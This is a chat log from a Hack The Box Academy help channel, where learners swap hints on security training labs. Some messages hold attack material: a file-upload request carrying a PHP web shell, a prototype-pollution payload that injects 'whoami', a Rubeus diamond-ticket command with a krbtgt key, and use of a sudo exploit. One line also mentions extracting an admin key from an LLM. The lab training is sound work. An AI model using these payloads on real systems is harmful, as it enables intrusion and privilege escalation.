#modules
correct..
i missed the target spawn point because it was on another section, thanks 😄 ..
but this doesn't satisfy my original question, why were the results inconsistent between host discovery scans in the real world scenario?
You don't want the password. You want the admin key. Keep trying to enumerate that from the LLM
Hi, in the "API ATTACKS" module (HTB ACADEMY), "Broken Object Property Level Authorization" section, I need help with the last question:
"Exploit another Mass Assignment vulnerability and submit the flag."
I know the hint gives you two endpoints: "Focus on the POST /api/v1/customers/orders and /api/v1/customers/orders/items endpoints." But I don't see how those two endpoints can help me. I think I'm missing more. Any suggestions?
actually, there's no spawn required
the question asks: Based on the last result... (this is referring to from the reading)
as a general tip of advice; if there is no target to spawn: the context is in the reading
the RCVD line is what would key you in
yeah right, i didn't need to spawn anything to answer the question, my question wasn't regarding the practice question in the first place, but SuperNuts note on my mistake that i scanned my own network is what i found worth noting.
yeah scanning anything was not required
yep, but still didn't satisfy my curiosity on why weren't the results consistent
wdym "results not consistent?"
i scanned my local network hosts using nmap 192.168.1.0/24 -sn, sometimes it returned 2 hosts, sometimes 3, sometimes 6
if you're scanning your own network it's likely there's some other stuff in play that's not responding in a timely manner
or a device may have connected to the network i.e. someone turned on a computer, a tv was turned on, etc.
the devices i was aiming to discover are connected in all instances of testing
but scanning a home network is in general not gonna be as consistent as a corporate network
so i'm very sure all devices were online
i.e. Windows doesn't allow ICMP discovery by default
as far as why a random amount of devices additionally discovered: did you log in to your router and check the devices that are assigned?
hmm..
i can ping a specific IP address (using ICMP). nmap uses ICMP when i force the -PE option, but still doesn't discover the same IP i was able to ping right before nmap command.
yes
i wouldn't think too hard about it tbh; it works in most other instances you'll use it ¯_(ツ)_/¯
i have 6 devices that are always online, i can ping all of them using ping command, but not always discovered using nmap
you'll get yourself too caught up on this to move forward with learning
could just be that they didn't respond to the ping request
¯_(ツ)_/¯
i.e. timed out
i thought this maybe the case, so i increased the max tries to 3 when using nmap
you may be right 🥲
the retries is for port discovery, not for Echo Requests
aaah 🙂
thanks for the indication :).. didn't know that
its so overwhelming at first with all of the options
so am i supposed to assume that the results are inconsistent due to being a local network? and this is not the regular case in real world corporate networks?
Check the roles for the creds provided for that question. Check the endpoints from the hint for required roles and see if any apply for the user you have. Then you have to just piece things together.
Correct
Let's try not to spoil content
Ok then, I'm having trouble with the second endpoint that provides the clue, but I can't find the necessary fields to fill them out. Is there any other endpoint you suggest checking to join?
Because the final 2 points the clue gives me are not enough, and I've even checked the roles, but I feel like I'm forgetting something.
You can just DM, as I don't think there's really a way to discuss this without spoiling content. Actually, look at the roles that user has and then check out the endpoints in the hint. There should be one specific role that you should focus on.
hey guys, why are these 2 tabs not redirecting me to the pages?
Works for me. Might be an issue on your end.
huh weird 🤔
I'm getting the drop-down menu.
@inland shoal might wanna try clearing your cache/logging out and logging back in, the standard stuff. If you still can't, just try another browser I guess xD 😂
Clear cookies and all site data. See if that works.
nope did not work, gonna try it tomorrow ig
Btw it's the same for me:
I was able to logout tho, welp, now I gotta log back in 😂
ok the stuff worked on my firefox, definitely Brave going nuts jn
thanks for the help at least @normal sand 🔥
Ahhh, I see. P.S. I was using Firefox.
?
the module teaches you how to utilize pivots iirc, you don't need to necessarily do the pivoting module; as far as the scanning, proxychains sucks most of the time

Currently going through this! A lot of these modules don't require a target spawn as the answers are within the text - and getting things to work has been a PITA to try and run through it to help make sense of what that "chapter" was about
Speaking of this issue ^ any idea how to transfer a payload to windows machine for Socat Bind Shell Redirection?
can u drop a hint or two i can access one of the hosts but no idea how to move further
Hi i need help in shells web php
Shell web app module
Y dont find user and password of rconfig server
do you have any tips for this? https://academy.hackthebox.com/module/110/section/1055
for the first one
i literally feel like it's gambling now, I || sent it to burp repeater and spam click until the response size is bigger than 808 but spent last 5 mins like that and it's not working ||
Working on the "File Transfers" in the "Windows File Transfer Methods" section. It has a bit telling us to use SMB to upload files from our target to our attack machine. First I tried this on the PwnBox. However WebDav needs to use port 80 and doesn't support using other ports per their docs. The PwnBox is already using port 80. So then I tried using my own VM. I was able to download and start WebDav on port 80 on my VM. On the target (Windows) machine I am able to open firefox and navigate to my attack box IP and see all the files. So it looks like WebDav is running correctly. However when I try to connect to it via the CLI I get the following:
C:\Users\htb-student>dir \\10.10.15.119\DavWWWRoot
The network path was not found.
C:\Users\htb-student>dir \\10.10.15.119\Downloads
The network path was not found.
C:\Users\htb-student>dir \\10.10.15.119
The filename, directory name, or volume label syntax is incorrect.
C:\Users\htb-student>dir \\10.10.15.119\
The specified path is invalid.
If I could use the web UI to upload I would, but that doesn't seem possible. Looks like you can't use iwr either to upload.
The command that the lesson suggests is:
copy C:\path\to\file \\10.10.15.119\DavWWWRoot\
copy C:\path\to\file \\10.10.15.119\Downloads\
Any pointers as to what is going wrong?
webdav is just a pain in the ass
Lol, noted. Also I have noticed that iwr to the internet is basically shut down from the CLI. I can iwr to my VM.... but not to github. So maybe the VM just doesn't allow it.... Seems dumb to have the VM attached to this lesson not allow replicating the commands in the lesson though.....
Probably something has changed, but there is no .viminfo file in the other users' directories.
Did you try to execute my command ?
the targets have no internet access, this is by design
Why is that "by design" when almost the entire module is teaching how to use http/https to do file transfers?
"by design" means that the targets don't have access to the outside world; so any tools you'll need would either have to already exist on it or be compiled/transferred over
they are on a segregated network, generally
and the ones on docker containers are also heavily limited
Running into a Segmentation fault (core dumped) on AEN, if anyone is able to provide more assistance I can share more.
UPDATE: Figured out the issue
There is also a question in the next section:
Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run `hasher <extracted file>` from the command line. Submit the generated hash as your answer.
But once you upload the file, the unzip command is not found on the target machine and you can't install it.... which makes it hard to do. I eventually used a python module to unzip it....
gunzip doesn't work on zip files if unzip isn't first installed on the machine. And yes you could unzip before transferring it. You could run hasher on it and not transfer it at all as well. But the question clearly says to (1) transfer, then (2) extract, then (3) run hasher.
guys can anyone lend a hand - Using Web Proxies
Page 10
Burp Intruder
Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag. ive legit tried as many word lists ... the only thing coming back with a 200 OK is index.html but i dont where i would find the flag, ive checked page source and it shows nothing what am i missing here ?
it's your username or real name, whichever you choose
maybe you are not fuzzing for §filename§.html but §filename§
fuzz for §filename§.html
so the endpoint is /admin/§filename§.html
yes...
Are there any people who can give advice on completing the task 'Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.' in the section https://academy.hackthebox.com/module/51/section/1592? I honestly don’t know what to do anymore...
DM me
thank you but ive tried that
I want support for hackthebox
How do you get added into ProLabs chat I bought it last week and stuck on a machine
Dante
Do you have url encoding off?
Hi I need help in shel web app module
I don't find user and password of rconfig server
If you still need help DM me
Do active boxes and challenges and you rankup
https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box
please read #welcome
they just giving the example of this vuln or they give this example from the lab exercise coz i can't find many of the example not in labs them in previous exercise
the exercise question is just a theory question can't even use it what learned on the labs just have to give the ans without using the content in practical
@blissful elm Please take care not to post content from modules above tier 0
Hi! In what module teach how to perform a SMB Relay Attack? It looks like AD Enum & Attacks is not the case
hello, where to ask query for above tier 0 modules
Ask here. Just don't reveal content. Remember anyone who has done the module and knows the answer doesn't need the extra context, they already know what to do. If you feel like you need to reveal more details you can ask to take it to DM.
Password attacks pass the certificate
Nn
HTB Module is not working, anyone know how to resolve without having internet access on the box?
Module: Automated Evil Twin Attacks -> Using Fluxion
Hmmm no, in that section is NTLM Relay
Then I guess it is not part of cpts and is in tier 3 module relay attacks
I guess is not touched in any module so far 
yeah more in depth NTLM relay
Anyone can help me with the skill assessment from Advanced SQL injection? I'm stuck
what is the average time to complete a module? 1 week? 3 weeks for the longest modules? 
it depends
not all modules are created equal (see: tiering) and not everyone has an easy time of applying the reading
hmmm I see
What is checked first in the DNS resolution process when you enter a domain name into a browser? (Format: Two words)
need help on network foundation
what section?
Domain Name System (DNS)
reread the subsection titled DNS Resolution Process (Domain Translation)
i typed the answer and it didn't work
look closely at Step 2
Hey, im working on module/204/section/2230 the LDAP - Data Exfiltration & Blind Exploitation question - i cant get the wildcard to work at all when prefixed with a character (e.g. "a*") - am i able to get a hint? is the password not able to be exfiltrated? even the provided htb-stdnt user and password which work, dont work when using the wildcard.
module/n/section/y isn't helpful at all
just say the module name and section name
helps others figure at a glance if they've already done it
Alright, the module name is injection attacks 🙂
i did find the flag, but i dont understand why i cant find the passwords as well :/ why would * work, but A* doesnt when i know the password starts with A?
Hey all, I'm struggling on 'Web Services & API Attacks" at the Skills Assessment. I'm having a hard time understanding how to form the SOAP call into a curl request. Does anyone have any suggestions on further reading that might help me better understand?
what is this error while i scan with gobuster
Windows lateral movement. The last question. I have access via vnc but I can't find the final path to the DC? Any help?
On the final skill assessment
Hi everyone, I am working on the Web Attacks, doing Bypassing Basic Authentication. I am doing the following to get the methods supported by the server, but is not giving any result:
Is this normal behaviour?
testing it on my end.
Yes, that's what I received as well.
My hypothesis is that page doesn't have anything defined to return for Options requests.
It might be that PHP is serving the page directly.
Just reading through that module: it even says that's what you're supposed to get.
Yes, i tried with HEAD but anyways is not bypassing the authentication. Maybe I missed something
Yeah, it was kind of difficult for me to wrap my brain around, as well. Give it another read-through.
Thanks I got it. It was too obvious for me 🙂
I need help for this: https://academy.hackthebox.com/module/306/section/3581
Also need help on this: https://academy.hackthebox.com/module/85/section/908#questionsDiv
so, the best way to get help for modules you're working on is:
- Module Name
- Section Name
- Question you're struggling with
- Generally what you've tried (while avoiding spoilers, i.e. logged in as j* and couldn't find anything)
this solved
okay will try next time
Hi everyone, I just managed to create a fairly well-made pipeline that solves the third question of the Filter Contents section in the Linux Fundamentals module:
"Use cURL from your Pwnbox (not the target machine) to obtain the source code of the https://www.inlanefreight.com/ website and filter all unique paths (https://www.inlanefreight.com/directory or /another/directory) of that domain. Submit the number of these paths as the answer."
My solution:
curl -s https://www.inlanefreight.com/ | grep -Eo "(https?://)?(www.)?inlanefreight.com[^\"?<#%']+" | sort -u | wc -l
I'm wondering if one of you more experienced folks could take a look and let me know if there's a better way (like a more efficient regex) to solve it, or if there are any edge cases where my regex might fail that I haven’t considered?
in Network Enumeration with nmap Module, Host and Port Scanning section https://academy.hackthebox.com/module/19/section/102.
i spawned the target for testing with the IP 10.129.45.245, i can access the target using the url http://10.129.45.245/.
problem:
i can't ping the target IP (doesn't exist), nor discover its ports using nmap 10.129.45.245 -sV, nmap 10.129.45.245 -sV -Pn. the results are always (filtered) for all of the first 1000 ports.
what am i missing here?
are you connected to the vpn?
wait i didn't see where you have the http access
do you have the vpn and the pwnbox running at the same time?
Yeah, i can access the web page of the target, it is the basic apache server home page
Nope
since it's asking for TCP -- -sT
Hello. I'm stuck on the third question in the Native Code tab of the Android fundamentals module. I'm leaving the relevant link. I'd appreciate it if you could help me, thank you. https://academy.hackthebox.com/module/195/section/2182
What is asking for TCP exactly?
Do u mean i should scan for ports using tcp packets?
Hey! I need some help with File Upload Attacks > Type Filters
the Question at the bottom is the following:
" The above server employs Client-Side, Blacklist, Whitelist, Content-Type, and MIME-Type filters to ensure the uploaded file is an image. Try to combine all of the attacks you learned so far to bypass these filters and upload a PHP file and read the flag at "/flag.txt" "
I have achieved successful file upload, and the page references the uploaded file after refreshing, but if I then go the referenced path it returns a 404.
for extra info: this is the request that I used:
||POST /upload.php HTTP/1.1
Host: 94.237.50.221:55446
Content-Length: 244
X-Requested-With: XMLHttpRequest
Accept-Language: en-GB,en;q=0.9
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLFRXiJEqnwAojr3P
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Origin: http://94.237.50.221:55446
Referer: http://94.237.50.221:55446/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryLFRXiJEqnwAojr3P
Content-Disposition: form-data; name="uploadFile"; filename="simplewebshell.phtml%00.gif"
Content-Type: image/gif

GIF8
<?php system($_REQUEST[cmd]); ?>
------WebKitFormBoundaryLFRXiJEqnwAojr3P--
||
This returned:
HTTP/1.1 200 OK
Date: Thu, 24 Jul 2025 10:24:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

File successfully uploaded
what am I doing wrong exactly? Why can I not go to this file after successful upload?
I'm mainly confused why the upload is a success but then the file does not exist
Find all TCP ports on your target. Submit the total number of found TCP ports as the answer. <--
nullbyte payloads are terrible, try another method
Alright, I'll give some others a try
can you elaborate why they are terrible btw? I'm interested in what exactly is going wrong
I'm not asking about the practice questions, it is a question regarding the content of the section
i'm saying: Did you try doing an nmap -sT scan
Ah, i will test it
if you change vpn regions and it still doesn't scan properly, reach out to support
hey i have doubt from the para in the module
https://academy.hackthebox.com/module/112/section/1069
the module says :
Authoritative name servers hold authority for a particular zone. They only answer queries from their area of responsibility, and their information is binding. If an authoritative name server cannot answer a client's query, the root name server takes over at that point. Based on the country, company, etc., authoritative nameservers provide answers to recursive DNS nameservers, assisting in finding the specific web server(s).
That paragraph wrongly said:
“If an authoritative name server cannot answer a query, the root server takes over…”
Actually, root servers come first, not later.
The correct order is:
Recursive Resolver → Root → TLD → Authoritative → Final IP
if im not wrong so how do i understand this ?
Google: "How DNS works" cloudflare has a decent knowledge base
Okay I finally found an extension that actually works!
@fathom pendant do you mind explaining (or linking me a resource) why nullbyte payloads suck? I'm not very familiar so would love to know :)
they're just annoying to deal with more than anything
Hello. I'm stuck on the third question in the Native Code tab of the Android fundamentals module. I'm leaving the relevant link. I'd appreciate it if you could help me, thank you. https://academy.hackthebox.com/module/195/section/2182
Yeah basically even cloudflare doesn't tell what happens when authoritative name servers fail to resolve
Anyone from the gulf? I'm from bahrain and I want a study partner 😩
Has anyone taken the course at https://academy.hackthebox.com/module/51/section/1592? I’ve been stuck on the task 'Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.' for about a week now. Can someone give me a hint?
Did you complete this? Been trying for an age now...had various flags out but none of them are correct...
Intro to C2 Operations with Sliver - The Domain Controller Compromise section I cannot get a diamond ticket to work. Here is the section:
Diamond Ticket
A diamond ticket is also a TGT that can be used to impersonate any user and access any service in the domain. A golden ticket is signed and encrypted by krbtgt's credential, while a diamond ticket is made by modifying a legitimate TGT issued by the domain controller. After requesting a legitimate TGT, the modification can be done by decrypting the TGT with krbtgt's credential, changing specific fields, and encrypting it.
We supplied the target user carrot, carrot's RID, RID of the group "Domain Admins", and krbtgt's AES256.
Here is the command:
sliver (http-beacon) > execute-assembly /home/htb-ac-1008/Rubeus.exe diamond /tgtdeleg /ticketuser:carrot /ticketuserid:1114 /group:512 /krbkey:f2a363997e7539b83637c12d872600a2b4c2727f2ebd35229d33dd85bdc11ed8 /nowrap
I obviously change the path to Rubeus.exe to match my machine
From the Hacker recipe website:
There seems to be some flags missing in the command from the module based on the example here. I know you don't need all the flags but I can't get this to work at all even using all the command flags.
Yo! What’s up guys? 💪
Just dropped into this server like a protein shake in a blender, ready to mix it up! I’m here to grow muscle, master skills, and maybe even unlock a few life achievements along the way. Whether it’s lifting heavy, moving smart, or just figuring out how to do one clean pull-up without questioning my existence I'm down for the grind.
Not here to be perfect just better than yesterday. So if you’ve got tips, routines, memes, or just good vibes, throw ‘em my way. Let’s train hard, laugh harder, and level up together.
Working on Attacking Enterprise Network, using my own VM and connecting. Trying to find a way to make the connection more consistent, it takes about 5 min to tunnel through the foothold device and load anything in browser
I'm stuck on Nmap Firewall and IDS/IPS Evasion - Hard Lab
What I'm missing anyone can point it ?? i found open UDP port 137 but after that I stuck
try scanning through DNS port
This is the hint that said "Our client also mentioned that they were forced to add a service that plays a vital role for their customer because they require large amounts of data."
-> Because this service is critical so it's very likely that this service only accepts connection from certain port. So doing typical scanning will get blocked because those ports are ephemeral ports. Look at this section again "https://academy.hackthebox.com/module/19/section/106" to see what else could you do
Hope this would shed some light on.
https://academy.hackthebox.com/module/112/section/1069 I need help with the question: What is the FQDN of the host where the last octet ends with "x.x.x.203"? I used DIG - AXFR Zone Transfer and DIG - AXFR Zone Transfer - Internal, as well as brute-forcing inlanefreight.htb (which only found three domains), but still couldn't find x.x.x.203
I used dnsenum, but still only had
ns.inlanefreight.htb.
mail1.inlanefreight.htb.
app.inlanefreight.htb.
I also thought about blasting the vpn.internal.inlanefreight.htb behind, but I didn't find anything
when i download the fatty-server.jar from attacking web applications vulnerabilities in thick client Applications section i get invalid or corrupt jar file anyone knows why
this is from attacking common applications module
You can try with different wordlist.
Is this the only place to ask for help? Has anyone been able to get this to work.
I made this toolkit to help with bug bounty recon, who knows it might be useful
Was it after modification?
i followed the steps and downloaded same as in the module
You can look up ipsec's video on fatty for some help with that section
I tried other wordlists but couldn't find it either.
hi
Can anyone help me?
Thanks @full echo you really saved my day I got it what I missed
Can you show me how you did the zone transfer?
Send you a private message?
Sorry It's been awhile since I finished this module. If the file is corrupted, it could have something to do with the signature.
Can you check this part one more time?
dig axfr inlanefreight.htb and dig axfr internal.inlanefreight.htb
Im stuck on RCE part of advanced sql injections. Installing postgresql-server-dev-13 doesnt work anymore. Did anyone manage to go around this? 🙏
From the context of the eric user -
I just checked my notes for this section of the module and I don't have anything documented, so it might not have worked for me either.
So, the issue is that the user carrot is not configured for delegate. It's just an example
funny that it's the only example in that section that uses Sliver besides the PTT part in the beginning.
Yeah I think since I already had the answer from a previous section, I just documented the content in my notes and called it good.
I have all the questions answered but I want to get the diamond ticket to work.
from Sliver
Could always try to use creds to access the host and see if you can configure things to make it work. Not sure if the lab is setup to now allow that, but figure if you have the right creds you should be able to.
Yeah I just don't know why it's even in the training if it doesn't work in the lab
Well I know some parts of labs are just informational, but would be cool to replicate it and ensure things on your end work or don't work. You could always use feedback to submit a recommendation or create an erratum if you believe it is something that should work and doesn't.
Right, I agree replication is great.
Detecting Windows Attacks with Splunk in the Detecting Pass-the-Hash section. Even after following the query in the steps and getting exactly where HTB show you. It asks you to put the answer of the ComputerName. No matter what I try, it still says it's incorrect?? Anyone know what is going wrong?
hi anyone i can dm for ""Hacking Wordpress" module at the very final flag of the final section which demands: Obtain a shell on the system and submit the contents of the flag in the /home/erika directory."
You need to add computername as an attribute to your stats count by operation if that makes sense
Dm me
Thanks for the reply…no need I managed to solve it 👍👍👍
Great!
Hi, I'm doing the password cracking module and I've been blocked from cracking protected file for 3/4 days. Can you give me some advice?
I'm not very experienced in this world that I've just started learning seriously. Should I start with something easier?
I try to see what was shown to me in the module section and I try to do what it tells me and to think about what I should do to make you understand where to crack a zip file. I tried to do what the module told me and do searches with Google but every time I can't finish the module.
I cant visit them for some reason
i tried visiting "http://localhost:5901" didn't work, included the ip in hosts file also.
Network Foundations, skills assessment
Anyone found any workaround for the constant rpc error: code = Unknown desc = implant timeout in the sliver module?
I can't crack the zip file. I try to use all the material provided by hack the box but every time it doesn't work. I tried to extract the file with unzip to see the file extensions and other ways to crack it but it doesn't work.
yeah i did so dw
Check dm
I don't know if it's worth it for me to change the module and go to an easier module and come back to that one in the future
@uneven obsidian Please do not reveal content from modules above tier 0
oops sorry
yes i used unzip and the name of file
Hello guys do you have roadmap to start cyber security+ good resource
May I send you a DM regarding my question?
So... No workaround for the rpc error? https://discordapp.com/channels/473760315293696010/774040263278592041/1397970702191300739
this is what he tells me
no sorry i'm busy rn
ok
Did someone get trouble with this last question of AI Fundamentals- Skill assessment ?? Thanks
What deep learning architecture, known for its ability to process sequential data like text by capturing long-range dependencies between words through self-attention, forms the basis of large language models (LLMs) that can perform tasks such as translation, summarization, question answering, and creative writing?
thanks for help
someone can assist me with the AEN on a private chat? i found something that i am pretty sure needs to be working
I dont know if i can write here the answer I have in mind, but is the only i have in mind
Someone can assist me please in AEN module, section Web Enumeration & Exploitation ?
I don't even understand the reason for the output
hmm try maybe hashcat -a 3 -m 9600 with it?
.
hi new, im sep
not allowed
Really??
thats not very nice
This server isn't for discussing illegal activity
Oh thanks
this is the output
If running it through hashcat you are going to need to remove the Confidential.xlsx: from the beginning of the hash and also add a wordlist to your command. You can always compare the hash that hashcat expects here: https://hashcat.net/wiki/doku.php?id=example_hashes
ok thanks
can I get some help pls? still stuck on this ty
Hey I deleted your screenshot due to the spoiling information. What module/section are you working on?
I also deleted your screenshot due to spoiling content over Tier0, but you should be good with the hashcat stuff now. If not let me know.
there's also hashid -m
no worries. I'm doing the footprinting module. working on MSSQL section question 2
You are having connection issues when trying to access the MSSQL instance?
Not sure if its connection issue but the error that i'm getting is Name or service not known
You can DM your input/output.
Anyone can give me a hand on the Credential Hunting in Network Shares Module?
Sadly its not possible to connect via RDP or WINRM to the target machine and its the last Answer missing :/
Do the credentials you have authenticate using netexec and the SMB protocol?
yes
Then you should be good.
Normally i should, but i am still not 😂
However either the Pwnbox or my Client are not able to dump stuff via nxc. Also it's not possible to connect via winrm or RDP against the Machine.
Crackmap or nxc are able to authenticate and show the accessible shares but after that there is a dead end and the machine crashes. The module should probably be reworked
I didn't have any issues with the module or that section.
Windows Lateral Movement
Skill Assessment
Last question getting connect to DC
Tried RDP with alternate port to DC with n* and pth. Also tried r*
Tried psexec.py with pth
WinRM not available
What am I missing here?
Did you try using the technology of the password you had to get? I didn't go that route, so I can't say if that is the way. If you have RDP access on that more isolated host, look in plain sight for something that is not present on the other hosts. If none of this makes sense, you can DM.
I appreciate the response ricky. I'll DM as I tried that technology as well just forgot to put it here.
I'm doing easy assessment from Attacking Common Services, I tried:
- nmap
- login to ftp with anonymous
- look through the website
- scan users in smtp with list from this module, and with xato-net-10... wordlist
So far I can't get any move forward, any tips? I'm probably missing something simple
I'd revisit the smtp content, maybe try different modes for user enumeration.
I tried every mode, but only after some time I found solution.
I terminated machine and spin a new one. Use command which I used before only changed IP and now it is working, ehh
Hi, based on your experience, is it better to focus on a single module and learn it in depth, or to get the basics of several modules and practice on VM?
The modules tend to have practical examples to learn from
And even some of the more in-depth stuff exists in higher tier modules
Stuxbot uploaded and executed mimikatz. Provide the process arguments (what is after .\mimikatz.exe, ...) as your answer.
does anyone know the answer to this, I can't figure this out to save my life.
I can't take the cdsa until I get this question right
best to say which module and section you're on too
Hello any mods available? I think there is a bug on module: https://academy.hackthebox.com/module/147/section/3714
I've successfully got the password (which is the only one) but htb still tells me that this is the wrong answer
Also mods arent staff
sorry
made sure of it, still not working
You can DM me what answer you have and I'll tell you if it's correct or not
i just did this like a week ago so it's unlikely that it's broken somehow
weird then
nvm
found it, that was my bad
thanks for the support anyway 
Introduction to Threat Hunting & Hunting With Elastic
Page 5
Stuxbot uploaded and executed mimikatz. Provide the process arguments (what is after .\mimikatz.exe, ...) as your answer.
can I please get some help with this
I think for that one you need to search for powershell scriptblocks and find it, you may also be able to find the answer by just searching "mimikatz.exe" in your query
can't remember exactly how i solved this problem but if u filter for event ID 4104 (powershell logs basically) then u should be fine hopefully
Has anyone encountered the issue of this command hanging indefinitely?
"grep -r 'HTB{' / 2>/dev/null"
Is there someone working on this module: Skills Assessment - Password Attacks? I got a foot on the DMZ01 host, but unfortunately, there are no tools there. I have tried all I know to elevate privileges with no luck. I will appreciate a hint.
pivot
Thanks! @fathom pendant I am working on it now!
try using dig ns inlanefreight.htb @127.0.0.1 command in the "DIG - Ns Query" section
Or use the "Subdomain Brute Forcing" technique
it's just I don't know what I do
dig is used to enumerate stuff
and I get some sub domains when I use it
but from that I don't understand what's the second step
when you use the command "dig ns inlanefreight.htb @10.129.14.128" what you can see in the ;; ADDITIONAL SECTION:? 
I have run into some issues with Sqlmap essentials module.
I’ve finished all the cases and into the shell questions. I got the first flag with cat flag.txt and that’s the only flag I can find.
In the shell I find the flag… but it’s the same flag as the previous question
i think your syntax is just wrong because of quotation placement, the right syntax should be grep -r "HTB{" 2>/dev/null?
I had to go eat I'm back
btw that's also the thing I don't understand what all of this means
question answer sections
oh sorry
look you dm
alright
I understand
what's the platinium badge you have ?
is it because you play season machines ?
nice
are they really hard ?
need help, answer wont work.
Linux Fundamentals
Working with Files and Directories
thats what i done but apparently the dates isnt correct
i mean the filename, it's rly dumb
For, Windows Server Privesc
https://academy.hackthebox.com/module/67/section/912
I try a few exploits without any successes for privesc.
It's always crash or fail to open a session.
Run it from the context of the other user
Aka run it from the terminal
@winter glade your screencap included a flag/answer.
I am stumped on the second question. When i do the directions it is saying... that is the only flag that I can find. The same as the first answer
im able to get into the shell and everything no big deal... then it leads me to the databases and one of the files is flag.txt
however, when i use the cat command to look at the contents in the file - it returns that same flag for the second answer
This is not the right flag...
I have tried to recall all the folders and there is not a flag anywhere
Please do not reveal contents from modules above tier 0 and do not post flags.
My apologies... I am not sure how to provide intext about what im doing to get help
You can say the module, section, and question you're on. Anyone who has completed the module and who can help has done it and doesn't need pictures or details, they know the attack path etc. You can say what you've tried (without revealing content etc) and take it to DM's if you really feel like you need to reveal something more.
Sounds good. Thank you. My apologies, i didnt mean to reveal anything. That is on me. wont happen again
I am looking for some help on the SQLMaps essentials - the OS Exploration question: Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.
Please DM me if you can help me.
I think I am having a issue with password cracking module cracking protected files the file won’t crack tried a few wordlists
In general use the wordlist provided in the resources or rockyou. If it doesnt crack with either you've done something wrong or it's not meant to be cracked
Fixed it just as I asked
Look at the method which returns a string to the Java layer
Think you need to ssh in
https://academy.hackthebox.com/module/112/section/1072 Can you help me? Question: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer. Hint: On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response times. I used smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt, but it did not return any results. Then I use nmap -p25 --script smtp-enum-users --script-args smtp-enum-users.timeout=10 to get | smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
I use these usernames to verify with VRFY in the smtp service, and only root returns 252.2.0.0 root. But the answer submitted by root is wrong. I have no clue, can you help me?
I'm so glad i found this.... The fact that you said this made me hate myself less lmao.
I was so close to passing it, i was at the ../logs part, 4 hours in, just gave up because i was pissed that the jar wouldnt update 😐
i need some help because I'm starting today
Follow the instructions 👆 👇
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
If you’re stuck on a module, this channel is the place to be
an instance of my HTB does not open eat now and it is not opening for me can complete the module
i need to find the flavor of the Linux operating system by running cat /etc/issue
What do you mean by not opening?
the instance does not open the Linux system for me can run the module
isn't that where I can send a picture to show what's going on?
Where could I get help about an issue with a not working module?
Step 2: get permission to share images
Thank you
Its about a module I messed up there haha
i am using translator because my English is weak yet so it is difficult to understand how I do to speak in general
RDP will not work and I have tried it over the course of multiple days with no success
Hi guys,
I think in the module "SQL Injection Fundamentals" the page "Subverting Query Logic" there is a mistake in the explanation of the Injection regarding AND, OR precedence:
"
The AND operator will be evaluated first, and it will return false. Then, the OR operator would be evaluated, and if either of the statements is true, it would return true. Since 1=1 always returns true, this query will return true, and it will grant us access.
"
That is not true I think, because 1=1 is true but will evaluate to false since it is connected with the "AND" password=something. I tested that also with username tom and toms and for tom i get success but for toms not, since it evaluates to non existing user → FALSE
Can someone check this. I hope this is the right channel to pinpoint such things
#1234357888114364508 and although the statement is wrong, the diagram above it is correct. Technically it's only the last sentence that makes no sense.
yes I think so
Hello everyone,
I'm currently stuck on a Hack The Box exercise and could use some assistance. I'm working on the "Wi-Fi Evil Twin Attacks" module, specifically the Skills Assessment section (https://academy.hackthebox.com/module/291/section/3287), and I'm on the very last question: "What credentials are obtained from the Wi-Fi network 'PulseGrid-ENT' (format: username:password)?"
From the provided information and the network type (enterprise as seen in the screenshot), I understand that I should likely be using EAPHammer to set up an evil twin access point to capture credentials, which I anticipate would be transmitted in cleartext via GTC.
However, my main problem is that I'm unable to find any connected clients on the "PulseGrid-ENT" network, even after extensive monitoring. This prevents me from capturing the necessary certificate that EAPHammer needs to create the evil twin. I see other devices on other networks, but not on this specific "PulseGrid-ENT" network.
Has anyone encountered this issue before, or does anyone have any pointers on how to proceed? Any help or guidance would be greatly appreciated!
Thanks in advance!
It was a long run but it's cleared. Thanks to the people that helped here.
Stuck on Windows Privilege Escalation on HTB academy in the Pillaging section I got the mozilla cookie for slack but doesnt work?
Be sure to do a complete refresh when you set the cookie, Ctrl + shift + R if that doesn't work:
Try restarting the lab or swapping VPNs
Hello guys, I am doing the whitebox attacks module and I am stuck on the remote code execution section.
I am doing all the steps described and when I send the payload
{"__proto__":{"deviceIP":"127.0.0.1; whoami"}} to /update endpoint, I don't pollute the parameter as text is telling to me.
Thanks going to try that soon
Anyone could help with https://academy.hackthebox.com/module/51/section/1590 ?
Trying to use CVE-2021-3156 as the module explains, but popping this error: $ ./sudo-hax-me-a-sandwich
./sudo-hax-me-a-sandwich: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./sudo-hax-me-a-sandwich)
Hello
the binary you are using use a library that's not supported in your machine
How to talk in general
Yeah, I had to compile it on my attack host, since target host doesn't have gcc to compile it, that's the issue
Any ideas?
I mean it doesn't make any sense that you explain how to compile it one way, but the target host for the exercise is not compatible and you don't explain any workaround on the module
gotta be comfortable with this in the academy , you are expected to do your own research
ig this -static might work @long igloo
you mean for the sudo hax me a sandwich, not for the lib right? since the lib with -static throws an error
not working for me lol
this is stressful, and looking into the discord search bar shows me other people with the exact same error ffs
probably copy your libc.so.6 to the target
isn't nessus already installed in the pwnbox ?
No
This is because it requires a license to activate [there's a free one and a paid one]
Thanks for sharing that. I was going through the Vulnerability Assessment module, and for the Skill Check lab, I initially thought it was installed locally, so I tried to log in using localhost
Nope, its installed on the target
yeah i got that now
